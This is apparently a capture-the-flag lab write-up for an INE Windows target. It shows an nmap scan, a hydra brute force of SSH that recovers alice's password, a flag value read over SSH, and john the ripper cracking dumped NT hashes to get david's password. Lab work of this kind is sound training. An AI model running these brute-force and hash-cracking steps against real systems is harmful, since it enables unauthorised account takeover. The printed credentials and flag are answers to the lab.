Attacking IP: 10.10.40.4
Victim IP: target.ine.local - 10.3.20.187
creds:
alice:princess1
david:orange
A target machine is accessible at target.ine.local. Identify the services and capure the flags.
nmap -sV -sC 10.3.26.200
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2026-01-01 19:53 IST
Nmap scan report for target.ine.local (10.3.26.200)
Host is up (0.0032s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=WIN-GQ7PTVEC6HL
| Not valid before: 2025-12-31T14:13:35
|_Not valid after: 2026-07-02T14:13:35
|_ssl-date: 2026-01-01T14:24:54+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-GQ7PTVEC6HL
| NetBIOS_Domain_Name: WIN-GQ7PTVEC6HL
| NetBIOS_Computer_Name: WIN-GQ7PTVEC6HL
| DNS_Domain_Name: WIN-GQ7PTVEC6HL
| DNS_Computer_Name: WIN-GQ7PTVEC6HL
| Product_Version: 6.3.9600
|_ System_Time: 2026-01-01T14:24:47+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-01T14:24:48
|_ start_date: 2026-01-01T14:13:25
We should note the openssh open port on this windows machine. This is likely used by admin for remote management and can be a likely initial target for us. The task is giving us the username of alice and after finding the open service port 22 we can use a tool like hydra to bruteforce the login to find their password.
hydra -l alice -P /usr/share/wordlists/metasploit/unix_passwords.txt target.ine.local ssh
[22][ssh] host: target.ine.local login: alice password: princess1
Success!
Now we can ssh to port 22 with the credentials
Directory of C:\Users\alice
01/01/2026 02:14 PM <DIR> .
01/01/2026 02:14 PM <DIR> ..
09/05/2020 07:55 AM <DIR> Contacts
09/05/2020 09:07 AM <DIR> Desktop
06/19/2024 11:42 AM <DIR> Documents
09/05/2020 09:11 AM <DIR> Downloads
09/05/2020 07:55 AM <DIR> Favorites
01/01/2026 02:14 PM 34 flag1.txt
06/20/2024 05:28 AM 2,416 hashdump.txt
09/05/2020 07:55 AM <DIR> Links
09/05/2020 07:55 AM <DIR> Music
09/05/2020 07:55 AM <DIR> Pictures
09/05/2020 07:55 AM <DIR> Saved Games
09/05/2020 07:55 AM <DIR> Searches
09/05/2020 07:55 AM <DIR> Videos
2 File(s) 2,450 bytes
13 Dir(s) 360,873,984 bytes free
alice@WIN-GQ7PTVEC6HL C:\Users\alice>type flag1.txt
5d4223ee70c04de7ac078013f629dcb5
Great, we check her directory and find the first flag. We also see an interesting hashdump.txt file that’s likely needed for a future task.
We can simply copy these into a text file back on our attacking machine now (The hashes we found).
Next we used john the ripper to crack the hashes and we found one more password for the user david
john --format=nt --wordlist=/usr/share/wordlists/metasploit/unix_passwords.txt hashes.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 30 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=48
Press 'q' or Ctrl-C to abort, almost any other key for status
princess1 (alice)
orange (david)